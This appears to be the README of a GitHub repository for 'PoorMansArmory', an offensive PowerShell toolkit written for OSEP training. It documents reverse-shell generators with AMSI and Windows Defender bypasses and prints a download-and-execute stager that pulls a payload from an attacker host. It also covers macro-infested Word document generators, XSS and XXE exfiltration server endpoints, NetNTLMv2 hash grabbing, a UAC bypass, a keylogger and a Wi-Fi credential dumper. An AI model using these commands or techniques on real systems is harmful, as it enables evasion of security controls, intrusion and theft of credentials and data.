tylerdotrar / PoorMansArmory

Collection of malleable payloads and tools that will bypass AMSI, Windows Defender, and self-signed certificate checks.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


Originally developed for OSEP, PoorMansArmory is a personal project of mine that is a collection of robust Windows-based payload generators and tools that aim to bypass AMSI, Windows Defender, and self-signed certificate checks.

The tools included range from...

  • Malleable reverse shell generation w/ optional SSL support, AMSI bypasses, self-signed certificate bypasses, etc.
  • Full automation of template injecting and/or macro infesting Office Word documents via the Office API.
  • Intuitive lateral file transfers over HTTPS via self-signed certificates using a custom python Flask web server.
  • Simple template web exploitation PoC payloads for XSS and XXE.
  • Robust service enumeration (e.g., unquoted service path detection & auditing, service binary ACLs).
  • Educational Proof-of-Concept payloads (e.g., PowerShell keylogger with built-in exfiltration).
  • etc., etc., etc.


Table of Contents

  1. Import-PMA.ps1
  2. pma_server.py
  3. revshells
  4. officemacros
  5. privesc
  6. wrappers
  7. misc
  8. License

1. Import-PMA.ps1

This is a simple script to import the primary PoorMansArmory scripts into the current session, while ignoring the less important ones (i.e., misc, officemacros/lib).


. ./Import-PMA.ps1


2. pma_server.py

# Synopsis:
# Simple Flask web server for bi-directional file transfers (POST and GET),
# supporting both HTTP and HTTPS using self-signed certificates.  Intended
# to be used with the PowerShell WebClient helper script(s), as well as
# templated Web Exploitation (XXE & XXE) payloads.

# Web Exploitation Support:
# o  XSS Cookie Exfiltration           (/cookie/<cookie_value>)
# o  XSS Saved Credential Exfiltration (/user/<username>, /password/<password>)
# o  XSS Keylogging                    (/keys/<key>)
# o  XXE Exfiltration                  (/xxe?content=<file_content>)

# Miscellaneous:
# o  Using '--ssl' with no specified port will toggle to 443.
# o  "Opsec" support: static URL with filenames specified in HTTP headers.
# o  PoC: HTML, MD, and PHP file rendering at in '/render/<file_name>'.

# Parameters:
# -d | --directory <string>  (default: ./uploads)
# -p | --port <int>          (default: 80,443)
# -s | --ssl                 (default: false)
# -D | --debug               (default: false)
# -h | --help


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Working with WebClientHelpers

Optional "WebClientHelpers" can be added to either the reverse shell or into a session, adding download, upload, and import functionality, allowing seemlessly communication with the pma_server.py web server for lateral file transfers. Theimport fuctionality specifically will attempt to remotely load hosted files into the session. If the filename ends with .dll or .exe, the function will attempt .NET reflection. Otherwise, the function will attempt to load the file assuming it contains PowerShell code.

  • Using the -WebClientHelpers or -WebClientHelpersURL parameters with Get-RevShell.ps1 will incorporate them into the reverse shell payload.
  • Using Load-WebClientHelpers.ps1 can retro-actively load them into the current session using Global scopes.

Functions TL;DR:

  • download --> Download files hosted on the PMA server
  • upload --> Upload files to the PMA server
  • import --> Load PowerShell files and C# binaries into the session

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Advanced Example

Advanced Example

  1. Launch pma_server.py to listen over port 443.
  2. Set up an SSL revshell listener on port 53.
  3. Execute advanced Get-RevShell.ps1 payload on the victim (that includes the -WebClientHelpers parameter).
  4. Use WebClient helpers to upload and import file(s) (this example includes .NET reflection).
  5. See files laterally moving on the pma_server.py.
  6. Set up a second listener on port 80.
  7. Execute the SharpShell.dll PoC via .NET reflection.
  8. Successful SharpShell execution.

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3. revshells

This directory contains scripts intended for advanced, robust reverse shell generation. They have been tested and built to work in both Linux and Windows Environments (i.e., PowerShell and PowerShell Core / pwsh), and default to PowerShell 5.0 payloads, but can be toggled to support PowerShell 2.0.

# pwsh
PS /opt/PoorMansArmory> Get-RevShell <attacker_ip> <listening_port> -SSL -AmsiBypass -WebClientHelpers > ./uploads/revshell
PS /opt/PoorMansArmory> Get-Stager -PayloadURL "http(s)://<ip_addr>/revshell"

[!info] Above example creates a reverse shell payload that...

  1. Is encrypted over self-signed SSL certificates
  2. Includes an AMSI bypass
  3. Has "WebClientHelpers" built-in
  4. Is output to the ./uploads directory that is served by pma_server.py
  5. Has a stager (or cradle) created pointing to that payload.

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# Synopsis:
# Modular, robust custom reverse shell generator with randomly generated variables
# that can bypass Windows Defender, provide seemless encryption, and have built-in
# tools for intuitive lateral file tranfers.
# Parameters:
#    Main Functionality
#      -IPAddress             -->   Attacker IP address or hostname (required)
#      -Port                  -->   Attacker listening port (required)
#      -Raw                   -->   Return reverse shell payload in cleartext rather than base64
#      -Help                  -->   Return Get-Help information
#    Modular Options
#      -AmsiBypass            -->   Disable AMSI in current session
#      -SSL                   -->   Encrypt reverse shell via SSL with self-signed certificates
#      -HttpsBypass           -->   Disable HTTPS self-signed certificate checks in the session
#      -B64Reflection         -->   Reflects a static Base64 string of 'SSC.dll' instead of using Add-Type in the payload
#      -PowerShell2Support    -->   Adjust the reverse shell payload to support PowerShell 2.0
#      -Binary                -->   PowerShell binary to use (default: 'powershell')
#      -Headless              -->   Create reverse shell payload without '-nop -ex bypass -wi h' parameters
#      -Verbose               -->   Make reverse shell variables descriptive instead of randomly generated
#    PMA Server Compatibility (Static)
#      -RemoteReflection      -->   Remotely reflect 'SSC.dll' from the revshell IP address instead of using Add-Type in the payload
#      -WebClientHelpers      -->   Add WebClientHelpers ('download','upload','import') into the revshell, pointing to the revshell IP address
#      -WebClientOpsec        -->   WebClientHelpers, but hiding filename requests in the HTTP request headers instead of in the URL.
#    PMA Server Compatibility (Specified)
#      -RemoteReflectionURL   -->   Specific URL hosting 'SSC.dll' to reflect (e.g., 'http(s)://<ip_addr>/SSC.dll')
#      -WebClientHelpersURL   -->   Specific URL of 'pma_server.py' to point WebClientHelpers to (e.g., 'http(s)://<ip_addr>')
#      -WebClientOpsecURL     -->   Specific URL of 'pma_server.py' to point WebClientHelpers to via OPSEC method.

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# Synopsis:
# Simple PowerShell stager generator to point to web hosted payloads or commands.
# Parameters:
#   -PayloadURL  -->  URL pointing to the reverse shell payload
#   -Command     -->  PowerShell command to execute instead of a reverse shell stager
#   -Raw         -->  Return stager payload in cleartext rather than base64
#   -Binary      -->  PowerShell binary to use (default: 'powershell')
#   -Headless    -->  Create stager payload without '-' parameters
#   -Help        -->  Return Get-Help information

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# View all parameters
Get-RevShell -Help
Get-Stager -Help

# Simple PowerShell Reverse Shell (base64)
Get-RevShell <attacker_ip> <listening_port>

# Simple PowerShell Reverse Shell (cleartext)
Get-RevShell <attacker_ip> <listening_port> -Raw

# PowerShell 2.0 Compatible Reverse Shell w/ Verbose Variables (cleartext)
Get-RevShell <attacker_ip> <listening_port> -Raw -Verbose -PowerShell2Support

# SSL Encrypted PowerShell Reverse Shell w/ AMSI Bypass (base64)
Get-RevShell <attacker_ip> <listening_port> -SSL -AmsiBypass

# Stager pointing to Robust PowerShell Reverse Shell
Get-RevShell <attacker_ip> <listening_port> -SSL -AmsiBypass -WebClientHelpers > ./uploads/revshell
Get-Stager -PayloadURL "http(s)://<attacker_ip>/revshell"

# Stager Output (default):

# Stager Output (cleartext):
powershell -nop -ex bypass -wi h -c {iex ((New-Object System.Net.WebClient).DownloadString('https(s)://<attacker_ip>/revshell'))}

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4. officemacros

This directory contains scripts intended for Microsoft Office-based payloads in the form of VBA macros and remote template injection.

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# Synopsis:
# Generate Macro Infested Word 97-2003 Documents (.doc)
# Requires: Microsoft Office API (VBA Project Object Model)
# o  Enable   : 'Trust Access to the VBA project object model'
# o  Location : Word --> Options --> Trust Center --> Macro Settings --> Developer Macro Settings
# Parameters:
#   -DocumentName   -->  Output name of the malicious Word Document (.doc)
#   -PayloadURL     -->  URL of the hosted payload that the macro downloads and executes
#   -MacroContents  -->  Advanced: User inputs custom macro instead of the generated one
#   -Help           -->  Return Get-Help information

# Example:
Get-MacroInfestedWordDoc -DocumentName invoice.doc -PayloadURL http://<attacker_ip>/revshell

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# Synopsis:
# Generate Macro Infested Word Template (.dotm) an Inject into a Word Document (.docx)
# Requires: Microsoft Office API (VBA Project Object Model)
# o  Enable   : 'Trust Access to the VBA project object model'
# o  Location : Word --> Options --> Trust Center --> Macro Settings --> Developer Macro Settings
# Parameters:
#   -TemplateURL    -->  URL where the malicious Word Template (.dotm) will be hosted
#   -PayloadURL     -->  URL of the hosted payload that the macro downloads and executes
#   -Document       -->  Advanced: Target templated Word Document (.docx) to inject
#   -MacroContents  -->  Advanced: User inputs custom macro instead of the generated one
#   -Help           -->  Return Get-Help information

# Example:
Get-TemplateInjectedPayload -TemplateURL http://<attacker_ip>/office/update.dotm -PayloadURL http://<attacker_ip>/revshell

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# Synopsis:
# Simple VBA Macro Generator, supporting three types of payloads.
# Payloads:
# o  Staged payload requires a URL hosting the intended text-based payload (with support for HTTPS via self-signed certificates).
# o  Stagless payload is a simple barebones shell command.
# o  Hash grabbing payload is a simple macro that reaches to a file share, revealing the user's NetNTLMv2 hash.
# Insert Into:
# o  Project (<filename>) --> Microsoft Word Objects --> ThisDocument
# Parameters: 
#   -RawPayload  -->  Payload to execute via simple shell macro (Alias: Stageless) 
#   -PayloadURL  -->  URL of a text-based payload that the macro executes (Alias: Staged) 
#   -SharePath   -->  Share path macro reaches out to to reveal user's NetNTLMv2 hash
#   -PrivateSub  -->  Make Subroutine Private instead of Public
#   -Help        -->  Return Get-Help information

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5. privesc

This directory contains scripts intended for privilege escalation or enumeration for privilege escalation vectors.

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# Synopsis:
# Enumeration script developed to easily parse the Access Control Lists (ACLs) and other parameters
# of Windows Services, such as the service owner, start mode, and whether the service path is vulnerable
# to an unquoted service path attack.  Unquoted service paths are able to be audited for writeability
# via the '-Audit' parameter.
# By default the script will return an object containing sorted service binary ACLs.
# Parameters:
#   -StartMode      -->  Services with specified start modes (e.g., 'Auto','Disabled','Manual')
#   -UnquotedPaths  -->  Services containing spaces in their paths but not wrapped in quotations
#   -Audit          -->  Test if vulnerable portions of the unquoted path are writeable for the current user
#   -Owner          -->  Services belonging to specified Owner (e.g., 'SYSTEM')
#   -FullControl    -->  Services with FullControl access rights for specified group (e.g., 'Administrators')
#   -OnlyPath       -->  Return full service paths instead of ACL's
#   -Help           -->  Return Get-Help information
  • Pretty pictures here.

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# Synopsis:
# Privilege esclation script developed to exploit the 'fodhelper.exe' UAC bypass,
# with moderate validation built in (e.g., session is 64-bit, current user is in
# the Local Administrators group).
# Parameters:
#   -Payload  -->  Command to execute when 'fodhelper.exe' is executed.
#   -Help     -->  Return Get-Help information
  • Pretty pictures here.

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6. wrappers

These are simple wrappers in the style of the impacket project on Kali Linux.

Current wrappers:

  • pma-server.sh : Allows pma_server.py usage from anywhere.
  • revshells.sh : Allows Get-RevShell and Get-Stager usage from anywhere (requires: pwsh)
  • vba-macro.sh : Allows Get-VBAMacro usage from anywhere (requires: pwsh)

Example Setup

git clone https://github.com/tylerdotrar/PoorMansArmory /usr/share/PoorMansArmory

# PMA Server
ln -s /usr/share/PoorMansArmory/wrappers/pma-server.sh /usr/bin/pma-server
ln -s /usr/share/PoorMansArmory/wrappers/revshells.sh /usr/bin/Get-Stager
# Usage:
pma-server <bonus_args>
pma-server --help

# RevShells
ln -s /usr/share/PoorMansArmory/wrappers/revshells.sh /usr/bin/Get-RevShell
ln -s /usr/share/PoorMansArmory/wrappers/revshells.sh /usr/bin/Get-Stager
# Usage:
Get-RevShell <ip_addr> <port> <bonus_args>
Get-RevShell -Help
Get-Stager http(s)://<ip_addr>/<revshell_file> <bonus_args>
Get-Stager -Help

# VBA Macros
ln -s /usr/share/PoorMansArmory/wrappers/vba-macro.sh /usr/bin/Get-VBAMacro
# Usage:
Get-VBAMacro <args>
Get-VBAMacro -Help

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7. misc

This directory contains scripts and .dll's that are either scarcely used, difficult to categorize, or simple/educational in design.

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  • This includes SSC.dll and Load-WebClientHelpers.ps1
  • Pretty pictures here.

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Proof-of-Concept (PoC)

  • This includes the Capture-Keys.ps1 keylogger, Get-WifiCredentials.ps1 dumper, Execute-As.ps1 script, and SharpShell.dll.
  • Pretty pictures here.

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  • This includes Invoke-RevShellSSL.ps1, Invoke-SharpShell.ps1, and Bypass-ExecPolicy.ps1.
  • Pretty pictures here.

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Collection of malleable payloads and tools that will bypass AMSI, Windows Defender, and self-signed certificate checks.

License:GNU General Public License v3.0


Language:PowerShell 99.8%Language:Python 0.1%Language:Shell 0.0%Language:JavaScript 0.0%